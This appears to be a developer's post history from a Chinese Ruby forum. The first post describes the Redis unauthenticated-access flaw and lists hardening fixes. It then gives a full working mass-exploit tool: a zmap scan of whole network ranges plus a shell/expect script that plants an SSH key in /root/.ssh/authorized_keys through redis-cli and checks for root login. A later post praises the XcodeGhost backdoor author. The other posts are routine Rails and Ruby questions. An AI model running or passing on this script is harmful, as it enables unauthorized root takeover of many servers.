qingxp9 (yyf)

请务必注意 Redis 安全配置，否则将导致轻松被入侵

qingxp9 — Wed, 18 Nov 2015 00:59:26 +0800

改了下标题，不吸引人都没人看

一、前言

前段时间，在做内网影响程度评估的时候写了扫描利用小脚本，扫描后统计发现，内网中 60% 开放了 redis6379 端口的主机处于可以被利用的危险状态，因为都是一些默认配置造成的考虑到本社区大部分开发者都会使用 redis，特此分享下以便大家可以对自己公司的内网进行一个排查。

二、漏洞介绍

Redis 默认情况下，会绑定在 0.0.0.0:6379，这样将会将 Redis 服务暴露到公网上，如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法，可以成功在 Redis 服务器上写入公钥，进而可以使用对应私钥直接登录目标服务器。

入侵特征：

Redis 可能执行过 FLUSHALL 方法，整个 Redis 数据库被清空
在 Redis 数据库中新建了一个名为 crackit（网上流传的命令指令）的键值对，内容为一个 SSH 公钥。
在 /root/.ssh 文件夹下新建或者修改了 authorized_keys 文件，内容为 Redis 生成的 db 文件，包含上述公钥

三、修复建议

1.禁止一些高危命令

修改 redis.conf 文件，添加

rename-command FLUSHALL ""
rename-command CONFIG   ""
rename-command EVAL     ""

来禁用远程修改 DB 文件地址

2.以低权限运行 Redis 服务

为 Redis 服务创建单独的用户和家目录，并且配置禁止登陆

3.为 Redis 添加密码验证

修改 redis.conf 文件，添加

requirepass mypassword

4.禁止外网访问 Redis

修改 redis.conf 文件，添加或修改

bind 127.0.0.1

使得 Redis 服务只在当前主机可用

四、扫描工具

1 使用说明

#以Ubuntu为例
su

# Requirements
apt-get install redis-server expect zmap

git clone https://github.com/qingxp9/yyfexploit
cd yyfexploit/redis

# 扫描6379端口
# 如果你要扫内网，把/etc/zmap/zmap.conf中blacklist-file这一行注释掉
zmap -p 6379 10.0.0.0/8 -B 10M -o ip.txt

# Usage
./redis.sh ip.txt

最后，将会生成几个 txt 文件记录结果其中： runasroot.txt 表示 redis 无认证，且以 root 运行 noauth.txt 表示 redis 无认证，但以普通用户运行 rootshell.txt 已写入公钥，可直接以证书登录 root 用户

像这样：

ssh -i id_rsa root@x.x.x.x

2 工具源代码

就贴下代码吧，各位大牛请在家长陪同下观看

#!/bin/sh
 if [ $# -eq 1  ]
 then
   ip_list=$1

   ##create id_rsa
   echo "****************************************Create id_rsa file"

   expect -c "
     spawn ssh-keygen -t rsa -f id_rsa -C \"yyf\"
     expect {
         \"*passphrase): \" {
             exp_send \"\r\"
             exp_continue
         }
         \"*again: \" {
             exp_send \"\r\"
         }
         \"*y/n)? \" {
             exp_send \"n\r\"
         }
     }
     expect eof
   "

   echo "\n\n****************************************Attack Targets"
   touch noauth.txt runasroot.txt rootshell.txt haveauth.txt
   i=0
   cat $ip_list | while read ip
   do
     i=`expr $i + 1`;
     #write id_rsa.pub to remote
     echo "*****${i}***connect to remote ${ip} redis "

     expect -c "
       set timeout 3
       spawn redis-cli -h $ip config set dir /root/.ssh/
       expect {
         \"OK\"                        { exit 0 }
         \"ERR Changing directory: Permission denied\"         { exit 1 }
         timeout                       { exit 2 }
         \"(error) NOAUTH Authentication required\"         { exit 3 }
       }
     "

     case $? in
         0)  echo "run redis as root"
             echo $ip >> noauth.txt
             echo $ip >> runasroot.txt
         ;;
         1)  echo "not run redis as root\n\n\n"
             echo $ip >> noauth.txt
             continue
         ;;
         2)  echo "connect timeout\n\n\n"
             continue
         ;;
         3)  echo "Have Auth\n\n\n"
             echo $ip >> haveauth.txt
             continue
         ;;
     esac

     (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
     cat foo.txt | redis-cli -h $ip -x set 1
     redis-cli -h $ip config set dir /root/.ssh/
     redis-cli -h $ip config set dbfilename "authorized_keys"
     redis-cli save

     #login test
     echo "#try to login"
     expect -c "
       set timeout 5
       spawn ssh -i id_rsa root@$ip echo \"yyf\"
       expect {
         \"*yes/no\"     { send \"yes\n\"}

         \"*password\"   { send \"\003\"; exit 1 }
         \"yyf\"         { exit 0 }
         timeout         { exit 2 }
       }
       exit 4
     "

     exitcode=$?

     if [ $exitcode -eq 0 ]
     then
       echo "---------------${ip} is get root shell"
       echo $ip >> rootshell.txt
     fi

     echo "\n\n\n"
   done

   echo "##########Final Count##########"
   wc -l $ip_list
   echo "----------"
   wc -l noauth.txt
   wc -l runasroot.txt
   wc -l rootshell.txt
   echo "----------"
   wc -l haveauth.txt

 else
   echo "usage: ./redis.sh ip.txt"
 fi

五、相关参考

如果代码有写得不合理的地方，还望指出哈

如何看待 Ruby 中的 “NULL”

qingxp9 — Sun, 01 Nov 2015 20:10:52 +0800

偶然看到一篇文章：《“NULL”：计算机科学中的最严重错误，造成十亿美元损失》

主要内容是说明 NULL 是计算机科学中最糟糕的错误，并引用了图灵奖得主 Tony Hoare 的话

“我把 Null 引用称为自己的十亿美元错误。它的发明是在 1965 年，那时我用一个面向对象语言 ( ALGOL W ) 设计了第一个全面的引用类型系统。我的目的是确保所有引用的使用都是绝对安全的，编译器会自动进行检查。但是我未能抵御住诱惑，加入了 Null 引用，仅仅是因为实现起来非常容易。它导致了数不清的错误、漏洞和系统崩溃，可能在之后 40 年中造成了十亿美元的损失。近年来，大家开始使用各种程序分析程序，比如微软的 PREfix 和 PREfast 来检查引用，如果存在为非 Null 的风险时就提出警告。更新的程序设计语言比如 Spec# 已经引入了非 Null 引用的声明。这正是我在 1965 年拒绝的解决方案。” 《Null References: The Billion Dollar Mistake》托尼·霍尔（Tony Hoare）

文章通过这几个观点逐步进行了阐述：

颠覆类型

是凌乱的

是一个特例

使 API 变得糟糕

使错误的语言决策更加恶化

难以调试

是不可组合的

其中”API 变得糟糕“以 Ruby 举了个例子，

以下原文引用：

假设我们创建一个 Ruby 类充当一个键值存储。这可能是一个缓存、一个用于键值数据库的接口等等。我们将会创建简单通用的 API：

class Store
         # associate key with value
         def set(key, value)
             ...
         end

         # get value associated with key, or return nil if there is no sch key
         def get(key)
             ...
         end 
    end

我们可以想象在很多语言中类似的类（Python、JavaScript、Java、C# 等）。现在假设我们的程序有一个慢的或者占用大量资源的方法，来找到某个人的电话号码——可能通过连通一个网络服务。

为了提高性能，我们将会使用本地存储作为缓存，将一个人名映射到他的电话号码上。

store = Store.new()
store.set('Bob', '801-555-5555')
store.get('Bob') # returns '801-555-5555', which is Bob’s number
store.get('Alice') # returns nil, since it does not have Alice

然而，一些人没有电话号码（即他们的电话号码是 nil）。我们仍然会缓存那些信息，所以我们不需要在后面重新填充那些信息。

store = Store.new()
store.set('Ted', nil) # Ted has no phone number
store.get('Ted') # returns nil, since Ted does not have a phone number

但是现在意味着我们的结果模棱两可！它可能表示：

这个人不存在于缓存中（Alice）
这个人存在于缓存中，但是没有电话号码（Tom）

一种情形要求昂贵的重新计算，另一种需要即时的答复。但是我们的代码不够精密来区分这两种情况。在实际的代码中，像这样的情况经常会以复杂且不易察觉的方式出现。因此，简单通用的 API 可以马上变成特例，迷惑了 null 凌乱行为的来源。用一个 contains() 方法来修补 Store 类可能会有帮助。但是这引入重复的查找，导致降低性能和竞争条件。

（引用完）

大家如何看待这个问题

在 Model 中使用 routes helper

qingxp9 — Thu, 29 Oct 2015 14:40:52 +0800

在 View 中我们可以调用 routes 的帮助方法得到路径地址比如下面代码的 search_path

<%= form_tag search_path , method: 'get'  do %> 
---
<%= end %>

如果想在 Model 中使用这个 helper 该怎么做呢？

中文网页中果然搜不到，终于还是在 stackoverflow 上找到了答案整理摘录如下：

在 Rails 3 和 4 中调用

Rails.application.routes.url_helpers

比如

Rails.application.routes.url_helpers.posts_path
Rails.application.routes.url_helpers.posts_url(:host => "example.com")

为方便使用我们可以直接 include 这个模块

Rails.application.routes.url_helpers

不过相比于 include 整个模块，更推荐 delegate

delegate :url_helpers, to: 'Rails.application.routes' 
url_helpers.users_url => 'www.foo.com/users'

http://stackoverflow.com/questions/341143/can-rails-routing-helpers-i-e-mymodel-pathmodel-be-used-in-models

OneAPM 简单体验及建议

qingxp9 — Wed, 23 Sep 2015 15:57:30 +0800

看到 oneapm 在论坛里的推广活动，在最近一个项目中也的确遇到了一些需要可视化的查看性能的工具，之前并没有相关的性能监控工具的使用经验，而这个活动的奖品还挺丰盛的，所以试用一下。

部署

部署比较简单，在 config 中 wget 一个 oneapm.yml 文件，填入 key，再添加 gem 重启一下服务器就好了。

后台监控页面

通过 Web 操作一下，过了一会在后台就能看见各种统计了

包括：web 事务、吞吐量、apdex、错误率

建议

页面的展示和使用体验应该其他用户展示得够多了，所以我重点写一下第一次使用这个系统所遇到的一些关于用户体验相关的东西吧。（有些比较主观，不保证提的建议一定有道理）

因为应用是开发模式，提示了在隐藏应用列表。但我不知道从哪可以打开这个隐藏应用列表，四处点了半天才发现在这个页面的下部。推荐在“隐藏应用列表”这加个超级链接，因为用户的注意力会集中在警告这里，我第一反应就是去点这里，以为会有个超链能直接跳过去。
部署时候最好提示一下在.gitignore 里面忽略这个 oneapm.yml 文件。虽然不太清楚泄露 key 会有什么危害，不过还是不要泄露的好。
新用户第一次点开应用监控的时候，可否做一些浏览导航提示的东西。因为监控这些东西最终的目的是为了帮助用户去改进程序，那如果我作为一个新手，我就不太清楚如何利用所看到的这些数据去改进程序。希望这方面能有一些比较基础的指导文档。
安全方面这东西是一个探针，可以获取我系统信息，所以我很想知道做了哪些安全方面的考虑。

第一，会不会有可被利用为远程代码执行等的安全风险。第二，像我这个测试应用是搭在企业内网中，探针可能就会获取到我请求的 ip 或者其他等比较敏感的东西，是否可以提供一个“安全模式”来避免抓取到敏感信息造成泄露风险。

这是我简单试用的一些感受，可以看到除了功能外，我十分很看中安全。我觉得在宣传文案上面除了对功能的描述，加上一些在安全方面的保障会更吸引用户来使用这款产品。

大家都在重下 Xcode 吗？

qingxp9 — Sat, 19 Sep 2015 00:09:38 +0800

对于这种熟练利用我国国情，深刻了解我国程序员不检验 hash，凡下载必用迅雷百度云的后门种植思路，只能佩服。

向这哥们致敬

夜不能寐！众多知名苹果 app 感染病毒

用 Ruby 完成了同事的一个算法问题

qingxp9 — Fri, 11 Sep 2015 00:06:47 +0800

在写一个爆破密码的字典生成工具，其中有这样一个需求：输入一个单词：列出这个单词的所有大小写组合，比如 ruby Ruby rUby ruBy rubY RuBy RuBY ....等等，这样 2^n 个

我想了想，思路为用二维数组保存每个字母的大写和小写：t=[["A", "a"], ["B", "b"], ["C", "c"]]，然后对它们进行位置固定的组合，使用了数组的 product 方法：

s="abcde"
t= Array.new(s.length) { Array.new(2) }

#生成二维数组
for i in 0...(s.length)
  #处理数字
  if s[i].to_i.to_s == s[i]
    t[i][0]=s[i]
  else
    t[i][0]=s[i].upcase
    t[i][1]=s[i].downcase
  end
end

q=t[0].product
for i in 1...s.length
  q=q.product(t[i])
end

q.each do |g|
  puts g.join
end

不过我觉得写得有点丑，肯定有更优美的实现，还望指点

如何合理的统计 Model 中字段的数据

qingxp9 — Fri, 05 Jun 2015 14:05:38 +0800

在做一个内网的设备搜索引擎，功能大概是：定时扫描内网 IP 段，根据 Banner 数据分析整理后储存到 mongodb，elasticsearch 提供搜索。只有一个 Website model，含有:port,:os,:http_server 等字段。 Web 页面：搜索关键词，经过 ES 查询返回相关结果。

问题：我想在侧边栏展示一下统计数据。比如，http_server 字段，它可能会是 nginx、apache 或者其他等等最后排序显示出来，像这样：我该怎样合理设计来统计这些信息呢？

我现在有两个想法， 1.维护一个关键词列表，通过定时任务使用 es 查询关键词的数量存入 redis，最后排序显示出来 2.建立 http_server model 与 Website 一对多的关系。但因为我还会储存 http_server 的版本信息等其他东西，每一组对应关系弄一个模型好像就复杂了。

请教一下大家。

命令行中新建 Github 远程仓库

qingxp9 — Sat, 13 Dec 2014 00:07:44 +0800

以往我们在 githubs 上面新建一个远程仓库需要这样几个步骤：

打开浏览器登录 github
点击右上角的加号，点击 New repository
输入 Repository name，点击 Create repository

这样就需要用到鼠标通过浏览器进行添加，熟悉用 vim 的朋友应该有体会写着代码突然换用鼠标操作的模式是有点难受的。于是我就真的十分难受， 没有鼠标就真的没法新建远程仓库了吗？

答案是否定的，我翻到了 Github Repository API ，上面说只需要认证用户发一个 POST 就可以新建，于是使用 curl 构造 POST:

curl -u 'username' https://api.github.com/user/repos -d '{"name":"RepoName"}'

其中，username 是你的用户名，RepoName 是你想命名的仓库名。这条命令执行后输入密码就创建成功了，会有仓库相关信息的回显。接着，就可以添加远程仓库并 Push:

git remote add origin git@github.com:username/RepoName.git
git push origin master

试试吧。

博客原文：create-a-remote-repo-on-github-from-the-cli

新生想用 ruby-china 的源码搭自己论坛，感觉完全没法下手啊

qingxp9 — Tue, 09 Dec 2014 23:48:12 +0800

使用了一段时间 discourse，文档比较全还用的 docker 部署也非常方便。感觉有些地方还是不太符合国内用户的习惯，ruby-china 这套就比较好，想尝试搭一下，看着 README 两三下开发模式跑起来了。

跑生产模式就有点无助了，

不知道在哪把 ssl 关掉，简单搜了一下也没找到相关文档。在我的想象中除了这 SSL 还有其他什么东西需要自己配置，不知道各位有没有部署 ruby-china 生产环境的资料能分享一下

为 devise 添加 token 认证

qingxp9 — Tue, 25 Nov 2014 22:28:31 +0800

前不久用 rails 作一个 iOS 应用的后端，因为传递的是 json 得用到 token，在处理用户验证上花了些时间找资料，因为 devise 在某次更新中把 token 认证模块去掉了。花了点小时整理了下为 devise 添加 token 认证的方法，不过怕使用的方法在某些方面存在一点问题或者是不够成熟，还请各位帮我看看，有问题能指点下。在更改完后我再将文章弄过来分享给其他需要的人。

目前暂时放在我的博客上 http://www.flincllck.com/use-json-authentication-api-on-rails4/

求助，关于 ios 发的带转义字符的 json 信息，rails 解析不对该怎么处理

qingxp9 — Tue, 11 Nov 2014 12:20:46 +0800

user.rb

def user_params
    params.permit(:email, :password, :password_confirmation, :school_id, :student_id, :student_pwd, :user_logo)
end

Started POST "/users.json" for 192.168.18.127 at 2014-11-11 11:11:21 +0800
Processing by Users::RegistrationsController#create as JSON
  Parameters: {"{\n  \"password_confirmation\" : \"1111\",\n  \"password\" : \"1111\",\n  \"student_pwd\" : \"2123305\",\n  \"email\" : \"test@test.com\",\n  \"user_logo\" : \"uploads\\/97631607.jpg\",\n  \"student_id\" : \"2123305\",\n  \"school_id\" : 1\n}"=>"[FILTERED]"}
Unpermitted parameters: {
  "password_confirmation" : "1111",
  "password" : "1111",
  "student_pwd" : "2123305",
  "email" : "test@test.com",
  "user_logo" : "uploads\/97631607.jpg",
  "student_id" : "2123305",
  "school_id" : 1
}, format
  [1m[35m (0.1ms)[0m  begin transaction
  [1m[36m (0.1ms)[0m  [1mrollback transaction[0m
Completed 200 OK in 4ms (Views: 0.2ms | ActiveRecord: 0.1ms)

ios app 发送 json 过来是带\ 和 \n的，看上去解析出了问题，不知道该如何处理，还请各位指点下

求助关于一个数据表的关联关系

qingxp9 — Thu, 06 Nov 2014 10:31:17 +0800

有两个表 Users、Activities 首先是一组关系：一个活动需要一个发起者，一个发起者有很多发起的活动这里是 User 和 Activity 1 对 n 的关系

这个关系我明白，设置了

class Activity
  belongs_to :user
end

class User
  has_many :activities
end

然后另一组关系：一个活动有很多参与者，一个用户有很多参与的活动就是 User 和 Activity n 对 n 的关系

但因为和上面第一个关系用到的是同样的表，我想大概是需要别名什么的。多对多需要建立的第三个表是按原先的名字 activity_usership 建呢，还是以设置的别名来建，我就不知道该怎么弄了，还望大家给我点提示